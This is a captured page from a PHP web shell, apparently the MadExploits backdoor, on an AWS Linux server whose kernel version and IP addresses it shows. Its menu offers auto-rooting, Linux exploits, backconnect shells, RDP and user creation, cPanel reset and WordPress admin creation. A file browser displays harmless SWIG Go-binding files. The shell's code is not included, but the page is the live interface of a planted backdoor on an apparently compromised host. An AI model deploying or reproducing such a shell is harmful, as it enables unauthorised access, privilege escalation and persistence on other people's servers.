Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.148.231.72
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
swig4.0 /
go /
[ HOME SHELL ]
Name
Size
Permission
Action
cdata.i
2.28
KB
-rw-r--r--
director.swg
1.48
KB
-rw-r--r--
exception.i
173
B
-rw-r--r--
go.swg
15.67
KB
-rw-r--r--
gokw.swg
555
B
-rw-r--r--
goruntime.swg
8.6
KB
-rw-r--r--
gostring.swg
851
B
-rw-r--r--
std_common.i
101
B
-rw-r--r--
std_deque.i
28
B
-rw-r--r--
std_except.i
1.26
KB
-rw-r--r--
std_list.i
928
B
-rw-r--r--
std_map.i
1.98
KB
-rw-r--r--
std_pair.i
773
B
-rw-r--r--
std_string.i
2.21
KB
-rw-r--r--
std_vector.i
2.83
KB
-rw-r--r--
stl.i
291
B
-rw-r--r--
typemaps.i
9.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gostring.swg
/* ------------------------------------------------------------ * gostring.swg * * Support for returning strings from C to Go. * ------------------------------------------------------------ */ // C/C++ code to convert a memory buffer into a Go string allocated in // C/C++ memory. %fragment("AllocateString", "runtime") %{ static _gostring_ Swig_AllocateString(const char *p, size_t l) { _gostring_ ret; ret.p = (char*)malloc(l); memcpy(ret.p, p, l); ret.n = l; return ret; } %} // Go code to convert a string allocated in C++ memory to one // allocated in Go memory. %fragment("CopyString", "go_runtime") %{ type swig_gostring struct { p uintptr; n int } func swigCopyString(s string) string { p := *(*swig_gostring)(unsafe.Pointer(&s)) r := string((*[0x7fffffff]byte)(unsafe.Pointer(p.p))[:p.n]) Swig_free(p.p) return r } %}
Close